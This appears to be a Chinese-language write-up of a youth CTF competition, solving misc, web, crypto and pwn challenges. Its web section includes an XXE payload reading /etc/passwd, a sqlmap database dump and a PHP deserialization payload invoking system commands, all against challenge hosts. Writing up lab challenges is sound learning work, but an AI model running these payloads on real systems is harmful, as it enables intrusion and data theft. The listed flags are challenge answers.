青少年CTF擂台挑战赛2024#Round1WP

misc

CTFer Revenge

image-20240229094716054

首先把他reverse一下

然后变成一个zip

image-20240229094746925

爆破后密码为z12345

flag

qsnctf{b414e3e3a6449ddba0997db259203eb7}

追光者

Hint1:数形结合

hint2:查找是个好东西

首先压缩包伪加密

追光者的请求.txt

有些人你看着挺正常的,吃饭睡觉,打打CTF,聊天大笑,其实心里边早就死透了……

我追寻光明,可我看不到一点光明,你能帮我找到光吗?

追光者.jpg末尾

5o+Q56S677ya5a+G56CB5Lit55qE5a2X56ym5YWo5Li65bCP5YaZ

解码后

“提示:密码中的字符全为小写”

然后foremost追光者.jpg

里面有个zip

人们不愿意相信光是AB,人们更愿意相信光是AD。人们也不愿意相信,密码就在眼前,因为人们只愿相信自己愿意相信的,只愿看到自己想看到的……

所以在原先的追光者.jpg搜索AB

image-20240302101558248

image-20240302101619130

iam5thplay

但是输入密码不对?根据别人wp可得iam5thplayer

#光.txt

三哈师傅说过:
“其实打ctf的最大乐趣就是挑战未知,挑战自己不知道的东西,做不出来也正常,毕竟出题人可能也是绞尽脑汁,千方百计弄点新的东西出来,就算最厉害的web手,也不敢说自己所有比赛都能做出来,只要努力去逼近自己意志极限,你过程有多痛苦,那么你做出来的时候就有多快乐。就算做不出来也没关系,比赛完成后,认真复现一下,我相信,这个题,这个考点,这个姿势,你会铭记一辈子,这其实才是真正的ctf内涵,真正的极客精神呢”

我的CTF价值观
1.摆正心态很重要:适度CTF益脑,沉迷CTF伤身
2.没有什么CTF是必须打的CTF
3.成绩固然重要,但比成绩更重要的是,感受CTF带给你的知识收获、友谊与成长

谢谢你帮我找到了在我生命中最温暖的光,但是这束光太过耀眼,我只看清了一半
qsnctf{NE73R

给了一半flag

image-20240302102036629

image-20240302102118698

压缩后发现crc32一样

所以我们就进行明文攻击

image-20240302103506041

这是为啥,后面查到还是用bandzip跟出题人一样的解压工具吧

image-20240302103502899

G3r1ing!

纵然世间黑暗,仍有一点星光。

}o1U_3V1G_

qsnctf{NE73R_G1V3_U1o}

多情

多情自古空余恨,此恨绵绵无绝期。

首先010editor发现尾部插入了一个图片,手撕或者foremost

发现kali打不开

然后爆破宽高

00000013_9412

996

得到996,打开之前的压缩包发现只有0和1,将996转化成二进制得到1111100100。刚好对应压缩包中01的数量,进行替换得到一串带&#字符

1
2
3
Lrp5mJcdEbbv2bnf6HQSNh

Lrp5mJcdEbbv2bnf6HQSNh

qsnctf{Lrp5mJcdEbbv2bnf6HQSNh}

小光的答案之书

小光是一个具有很强的好奇心的孩子,他总是热衷于探索世界,寻找各种问题的答案。快来https://bbs.qsnctf.com/thread-533-1-1.html寻找答案吧!

image-20240302153115270

对照圣堂武士密码(猪圈密码升级版)解码得到LIFE

image-20240302153224829

LIFE,大写不对,小写对了

https://bbs.qsnctf.com/thread-534-1-1.html

关注公众号:中学生CTF,关键词:青少年CTF2024

qsnctf{49e7bd5efe114cd2d93ef60ddb2f8714}

ez_model

从Pytorch开始的AI之路

can_can_need_computer

呜呜呜呜我的电脑被队里的web手黑掉了,她更改了我电脑中的一些文件名并且留下了后门来威胁我,你能帮我救回我的电脑吗

Web

EasyMD5

php没有难题

image-20240302155126153

随便传一个文件

Not a PDF! angry!!!!!! get out from my page

上传pdf

do you konw what is MD5 Collision?

估计要md5碰撞

  • QNKCDZO
  • 240610708

然后改为pdf

image-20240302161414952

qsnctf{7950702b10a540978915470c019a9e5c}

PHP的后门

PHP竟然也会有后门这种东西?你知道吗!

image-20240302161628221

抓包看响应头

image-20240302161642971

https://cloud.tencent.com/developer/article/1839234

image-20240302162155231

image-20240302162246370

PHP的XXE

XXE(XML External Entity)是一种针对XML解析器的攻击技术,也被称为XML外部实体注入攻击。当应用程序解析用户提供的XML输入时,如果没有正确地配置或过滤外部实体,攻击者可以利用这一漏洞执行恶意操作。

XML允许在文档中定义和使用外部实体,这些实体可以从外部资源(如文件、网络URL等)中获取数据。如果应用程序解析了包含恶意外部实体的XML输入,并且未对外部实体进行适当的处理或限制,攻击者可能会读取敏感文件、执行远程代码或进行其他恶意活动。

image-20240302165531437

php7.0.30

https://blog.csdn.net/weixin_45808483/article/details/122000030

1
2
3
4
5
6
7
8
9
GET /simplexml_load_string.php

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>

image-20240302170306271

Easy_SQLi

弱口令admin 123456

1
python sqlmap.py -r "D:\UserData\Desktop\1.txt" --batch -D qsnctf -T users -C password --dump
1
2
3
4
5
6
7
8
9
Database: qsnctf
Table: users
[2 entries]
+------------------------------------------+
| password |
+------------------------------------------+
| 123456 |
| qsnctf{ae7dbc5614964c3a9489356fb03a7a76} |
+------------------------------------------+

雏形系统

今天是公司里的工程师小王被裁员的日子,但小王并没有闲着。在离开之前,他突发奇想,决定留下一份特别的礼物给公司,于是他设计了一个登录页面的雏形。

扫出来为/www.zip

下载后为

image-20240302230024176

eval换成echo,然后内容替代eval

image-20240302231024068

1
2
3
4
5
6
7
8
9
$a = new wo();
$a -> sex= 'boy';
$a -> age= 'eighteen';
$a -> intention= new shi();
$a -> intention -> pass = 'cat /flag';
$a -> intention -> next = new Demo();
echo serialize($a);

#O:2:"wo":3:{s:3:"sex";s:3:"boy";s:3:"age";s:8:"eighteen";s:9:"intention";O:3:"shi":2:{s:4:"next";O:4:"Demo":1:{s:1:"a";N;}s:4:"pass";s:9:"cat /flag";}}

最后payload

1
username=O:2:"wo":3:{s:3:"sex";s:3:"boy";s:3:"age";s:8:"eighteen";s:9:"intention";O:3:"shi":2:{s:4:"next";O:4:"Demo":0:{}s:4:"pass";s:7:"cat /f*";}}&password=system

image-20240302232800324

crypto

解个方程

欢迎来到青少年CTF,领取你的题目,进行解答吧!这是一道数学题!!
p = 288299858297525337395934332789289425161
q = 222488721608984752459883471652539879597
e = 65537
d = ?

1
2
3
4
5
6
7
8
9
10
11
import gmpy2

p=288299858297525337395934332789289425161
q=222488721608984752459883471652539879597
e=65537

phi=(p-1)*(q-1)
d=gmpy2.invert(e,phi)
print(d)

#50721071849721331519100359129443294064236447036125296146270837889057937098913

image-20240229095055791

qsnctf{030c91ccb75e4a199a64dcd4102d10d4}

四重加密

1
2
3
OFZW4Y3UMY======

qsnctf
1
2
3
&#122;&#99;&#121;&#101;&#123;&#109;&#120;&#109;&#101;&#109;&#116;&#120;&#114;&#122;&#116;&#95;&#108;&#122;&#98;&#104;&#97;&#95;&#107;&#119;&#109;&#113;&#122;&#101;&#99;&#125;&#124;&#107;&#101;&#121;&#61;&#104;&#101;&#108;&#108;&#111;

zcye{mxmemtxrzt_lzbha_kwmqzec}|key=hello

维吉尼亚

1
2
3
synt{yqitbfqnoi_xsxwp_wpifoqv}

flag{ldvgosdabv_kfkjc_jcvsbdi}

qsnctf{ldvgosdabv_kfkjc_jcvsbdi}

Pwn

简单的数学题

image-20240229110336888

qsnctf{0ada718f6df74f4c9a580c9911c1efcd}